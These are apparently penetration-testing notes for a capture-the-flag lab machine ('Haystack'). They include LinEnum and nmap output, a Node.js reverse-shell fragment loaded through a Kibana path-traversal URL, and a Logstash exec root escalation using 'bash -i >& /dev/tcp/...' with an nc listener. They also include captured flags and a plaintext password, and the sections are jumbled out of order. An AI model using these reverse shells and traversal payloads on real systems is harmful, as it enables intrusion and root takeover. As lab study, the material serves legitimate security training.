120K -rwxr-xr-x. 1 root root 118K Oct 30 2018 /usr/lib/polkit-1/polkitd
1.6M -rwxr-xr-x. 1 root root 1.6M Oct 30 2018 /usr/lib/systemd/systemd
340K -rwxr-xr-x. 1 root root 339K Oct 30 2018 /usr/lib/systemd/systemd-journald
624K -rwxr-xr-x. 1 root root 621K Oct 30 2018 /usr/lib/systemd/systemd-logind
408K -rwxr-xr-x. 1 root root 407K Oct 30 2018 /usr/lib/systemd/systemd-udevd
0 lrwxrwxrwx. 1 root root 37 Aug 27 2019 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin64/appLoader
256K -rwxr-xr-x. 1 root root 255K Apr 12 2018 /usr/sbin/chronyd
72K -rwxr-xr-x. 1 root root 69K Nov 20 2018 /usr/sbin/crond
68K -r-xr-xr-x. 1 root root 68K Nov 19 2018 /usr/sbin/lvmetad
2.5M -rwxr-xr-x.
1 root root 2.5M Nov 28 2018 /usr/sbin/NetworkManager 652K -rwxr-xr-x. 1 root ?root 649K Oct 30 2018 /usr/sbin/rsyslogd 836K -rwxr-xr-x. 1 root root 834K Apr 11 2018 /usr/sbin/sshd 0 lrwxrwxrwx. 1 root root 37 Aug 27 2019 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin64/vmtoolsd 84K -rwxr-xr-x. 1 root root 83K Sep 26 2018 /usr/share/elasticsearch/modules/x-pack-ml/platform/linux-x86_64/bin/controller 34M -rwxrwxr-x. 1 root root 34M Sep 26 2018 /usr/share/kibana/bin/../node/bin/node ESC[00;31m[-] /etc/init.d/ binary permissions:ESC[00m lrwxrwxrwx. 1 root root 11 Nov 28 2018 /etc/init.d -> rc.d/init.d ESC[00;31m[-] /etc/rc.d/init.d binary permissions:ESC[00m total 96 drwxr-xr-x. 2 root root 125 Aug 27 2019 . drwxr-xr-x. 10 root root 127 Oct 30 2018 .. -rwxr-x---. 1 root root 4080 Sep 26 2018 elasticsearch -rw-r--r--. 1 root root 18281 Aug 24 2018 functions -rwxr-xr-x. 1 root root 3524 Sep 26 2018 kibana -rwxr-xr-x. 1 root root 4569 Aug 24 2018 netconsole -rwxr-xr-x. 1 root root 7923 Aug 24 2018 network -rw-r--r--. 1 root root 1160 Oct @30 2018 README -rwxr-xr-x. 1 root root 45702 Aug 27 2019 vmware-tools ESC[00;31m[-] /lib/systemd/* config file permissions:ESC[00m /lib/systemd/: total 7.8M drwxr-xr-x. 25 root root 12K Jan 23 2019 system drwxr-xr-x. 2 root root 4.0K Dec 11 2018 system-generators drwxr-xr-x. 2 root root 271 Dec 11 2018 user drwxr-xr-x. 2 root root 144 Dec 11 2018 system-preset drwxr-xr-x. 2 root root 162 Dec 11 2018 catalog lrwxrwxrwx. 1 root root 24 Nov 28 2018 systemd-sysv-install -> ../../..//sbin/chkconfig -rwxr-xr-x. 1 root root 1.6M Oct 30 2018 systemd -rwxr-xr-x. 1 root root 74K Oct 30 2018 systemd-backlight -rwxr-xr-x. 1 root root 65K Oct 30 2018 systemd-binfmt -rwxr-xr-x. 1 root root 36K Oct 30 2018 systemd-cgroups-agent -rwxr-xr-x. 1 root root 134K Oct 30 2018 systemd-coredump -rwxr-xr-x. 1 root root 41K Oct 30 2018 systemd-hibernate-resume -rwxr-xr-x. 1 root root 364K Oct 30 2018 systemd-importd -rwxr-xr-x. 
1 root root 376K Oct 30 2018 systemd-localed
-rw-r--r--.
### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.23

[-] www home dir contents:
/var/www/:
total 0
drwxr-xr-x. 3 nginx nginx 18 Nov 30 2018 .
drwxr-xr-x. 20 root root 278 Nov 30 2018 ..
drwxr-xr-x. 2 nginx nginx 42 Jan 25 2019 html

/var/www/html:
total 184K
drwxr-xr-x. 2 nginx nginx 42 Jan 25 2019 .
drwxr-xr-x. 3 nginx nginx 18 Nov 30 2018 ..
-rw-r--r--. 1 nginx nginx 55 Jan 25 2019 index.html
-rwxr--r--. 1 root root 179K Jan 25 2019 needle.jpg

### INTERESTING FILES ####################################
[-] Useful file locations:
/usr/bin/curl

[-] Can we read/write sensitive files:
-rw-r--r--. 1 root root 1159 Jan 23 2019 /etc/passwd
-rw-r--r--. 1 root root 538 Jan 23 2019 /etc/group
-rw-r--r--. 1 root root 1819 Oct 30 2018 /etc/profile
----------. 1 root root 805 Feb 6 2019 /etc/shadow

[-] SUID files:
-rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh
-rws--x--x. 1 root root 24048 Oct 30 2018 /usr/bin/chfn
-rws--x--x. 1 root root 23960 Oct 30 2018 /usr/bin/chsh
-rwsr-xr-x. 1 root root 44320 Oct 30 2018 /usr/bin/mount
-rwsr-xr-x. 1 root root 64328 Oct 30 2018 /usr/bin/chage
-rwsr-xr-x. 1 root root 78272 Oct 30 2018 /usr/bin/gpasswd
-rwsr-xr-x. 1 root root 41872 Oct 30 2018 /usr/bin/newgrp
-rwsr-xr-x. 1 root root 32208 Oct 30 2018 /usr/bin/su
-rwsr-xr-x. 1 root root 32048 Oct 30 2018 /usr/bin/umount
---s--x--x. 1 root root 147392 Oct 30 2018 /usr/bin/sudo
-rwsr-xr-x. 1 root root 23656 Oct 30 2018 /usr/bin/pkexec
-rwsr-xr-x. 1 root root 57664 Nov 20 2018 /usr/bin/crontab
-rwsr-xr-x. 1 root root 27832 Jun 10 2014 /usr/bin/passwd
-rwsr-xr-x. 1 root root 11216 Apr 11 2018 /usr/sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root 36280 Apr 11 2018 /usr/sbin/unix_chkpwd
-rwsr-xr-x. 1 root root 11376 Oct 30 2018 /usr/sbin/usernetctl
-rwsr-xr-x. 1 root root 15512 Oct 30 2018 /usr/lib/polkit-1/polkit-agent-helper-1
-r-sr-xr-x. 1 root root 14320 Aug 27 2019 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-r-sr-xr-x. 1 root root 13628 Aug 27 2019 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-rwsr-x---. 1 root dbus 58024 Nov 2 2018 /usr/libexec/dbus-1/dbus-daemon-launch-helper

[+] Possibly interesting SUID files:
-rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh

[+] World-writable SUID files:
-rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh

[-] SGID files:
-rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh
-r-xr-sr-x. 1 root tty 15344 Jun 9 2014 /usr/bin/wall
-rwxr-sr-x. 1 root tty 19624 Oct 30 2018 /usr/bin/write
---x--s--x. 1 root nobody 382240 Apr 11 2018 /usr/bin/ssh-agent
-rwxr-sr-x. 1 root root 7208 Oct 30 2018 /usr/sbin/netreport
-rwxr-sr-x. 1 root postdrop 218632 Oct 30 2018 /usr/sbin/postdrop
-rwxr-sr-x. 1 root postdrop 260112 Oct 30 2018 /usr/sbin/postqueue
-rwx--s--x. 1 root utmp 11192 Jun 9 2014 /usr/libexec/utempter/utempter
---x--s--x. 1 root ssh_keys 469880 Apr 11 2018 /usr/libexec/openssh/ssh-keysign

[+] Possibly interesting SGID files:
-rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh

[+] World-writable SGID files:
-rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh

[+] Files with POSIX capabilities set:
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p

[-] World-writable files (excluding /proc and /sys):
-rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh

[-] NFS config details:
-rw-r--r--. 1 root root 0 Jun 7 2013 /etc/exports

[-] NFS displaying partitions and filesystems - you need to check if exotic filesystems
#
# /etc/fstab
# Created by anaconda on Wed Nov 28 12:04:41 2018
#
# Accessible filesystems, by reference, are maintained under '/dev/disk'
# See man pages fstab(5), findfs(8), mount(8) and/or blkid(8) for more info
#
/dev/mapper/centos-root / xfs defaults 0 0
UUID=782e0556-01fa-4981-9f45-c39b049bacdf /boot xfs defaults 0 0
/dev/mapper/centos-swap swap swap defaults 0 0

[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r--. 1 root root 72 Jun 20 2019 /etc/resolv.conf
-rw-r--r--. 1 root root 1285 Nov 2 2018 /etc/dracut.conf
-rw-r--r--. 1 root root 9 Jun 7 2013 /etc/host.conf
-rw-r--r--. 1 root root 216 Nov 2 2018 /etc/sestatus.conf
-rw-r--r--. 1 root root 28 Feb 27 2013 /etc/ld.so.conf
-rw-r--r--. 1 root root 1746 Nov 28 2018 /etc/nsswitch.conf
-rw-r--r--. 1 root root 641 Oct 30 2018 /etc/krb5.conf
-rw-r--r--. 1 root root 449 Oct 30 2018 /etc/sysctl.conf
-rw-r-----. 1 root root 191 Jun 19 2018 /etc/libaudit.conf
-rw-r--r--. 1 root root 662 Jul 31 2013 /etc/logrotate.conf
-rw-r--r--. 1 root root 55 Oct 30 2018 /etc/asound.conf
-rw-r--r--. 1 root root 2391 Oct 12 2013 /etc/libuser.conf
-rw-r--r--. 1 root root 842 Oct 30 2018 /etc/GeoIP.conf
-rw-r--r--. 1 root root 970 Nov 4 2018 /etc/yum.conf
-rw-r--r--. 1 root root 5171 Oct 30 2018 /etc/man_db.conf
-rw-r--r--. 1 root root 3232 Oct 30 2018 /etc/rsyslog.conf
-rw-r--r--. 1 root root 7265 Dec 11 2018 /etc/kdump.conf
-rw-r--r--. 1 root root 1108 Apr 12 2018 /etc/chrony.conf
-rw-r--r--. 1 root root 112 Oct 30 2018 /etc/e2fsck.conf
-rw-r--r--. 1 root root 936 Oct 30 2018 /etc/mke2fs.conf
-rw-r-----. 1 root root 3181 Oct 30 2018 /etc/sudo-ldap.conf
-rw-r-----. 1 root root 1786 Oct 30 2018 /etc/sudo.conf
-rw-r--r--. 1 root root 33 Jun 24 2019 /etc/vconsole.conf
-rw-r--r--. 1 root root 19 Nov 28 2018 /etc/locale.conf

[-] Current user's history files:
lrwxrwxrwx. 1 root root 9 Jan 25 2019 /home/security/.bash_history -> /dev/null

[-] Location and contents (if accessible) of .bash_history file(s):
/home/security/.bash_history

[-] Location and Permissions (if accessible) of .bak file(s):
-rw-r--r--. 1 root root 1735 Apr 10 2018 /etc/nsswitch.conf.bak
-rw-rw-r--. 1 root root 7141 Sep 26 2018 /usr/share/kibana/node/lib/node_modules/npm/node_modules/request/node_modules/form-data/README.md.bak
-rw-r--r--. 1 root root 7138 Sep 26 2018 /usr/share/kibana/node_modules/form-data/README.md.bak

[-] Any interesting mail in /var/mail:
lrwxrwxrwx. 1 root root 10 Nov 28 2018 /var/mail -> spool/mail

### SCAN COMPLETE ####################################

File System
Writeable Files\Directories
Directory List
find / -user kibana 2>/dev/null | grep -v usr | grep -v proc

Running Processes
Process List

"10.10.14.28", function(){
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
});
return /a/;
})();
http://localhost:5601/api/console/api_server?apis=../../../../../../../../../tmp/shell.js

Service Exploited: LogStash
Vulnerability Type:
Exploit POC:
Description:
Discovery of Vulnerability
Output.conf uses exec and runs as root
Exploit Code Used
echo 'Ejecutar comando : bash -i >& /dev/tcp/10.10.XX.XX/1234 0>&1' > /opt/kibana/logex
nc -lvnp 1234
Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

Proof\Flags\Other
listening on [any] 4444 ...
connect to [10.10.14.28] from (UNKNOWN) [10.10.10.115] 59572
bash: no hay control de trabajos en este shell
[root@haystack /]# whoami
whoami
root
[root@haystack /]# ifconfig
ifconfig
bash: ifconfig: no se encontró la orden
[root@haystack /]# cat /home/security/user.txt
cat /home/security/user.txt
04d18bc79dac1d4d48ee0a940c8eb929
[root@haystack /]# cat /root/root.txt
cat /root/root.txt
3f5f727c38d9f70e1d2ad2ba11059d92
[root@haystack /]#

Passwords
user: security
pass: spanish.is.key

Hashes

/dev/pts/1
/etc/logstash/startup.options
/var/lib/kibana
/var/lib/kibana/uuid
/var/lib/kibana/phantomjs-2.1.1-linux-x86_64
/var/log/kibana
/opt/kibana
bash-4.2$ find / -group kibana 2>/dev/null | grep -v usr | grep -v proc
find / -group kibana 2>/dev/null | grep -v usr | grep -v proc
/etc/logstash/conf.d
/etc/logstash/conf.d/output.conf
/etc/logstash/conf.d/input.conf
/etc/logstash/conf.d/filter.conf
/etc/logstash/log4j2.properties
/etc/logstash/logstash-sample.conf
/etc/logstash/pipelines.yml
/etc/logstash/jvm.options
/etc/logstash/logstash.yml
/etc/logstash/startup.options
/etc/logstash/logstash.yml.rpmnew
/var/lib/kibana
/var/lib/kibana/uuid
/var/lib/kibana/phantomjs-2.1.1-linux-x86_64
/var/log/kibana
/opt/kibana

port for 10.10.10.115
Host is up (0.59s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
|   256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_  256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp   open  http    nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open  http    nginx 1.12.2
| http-methods:
|_  Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.87 seconds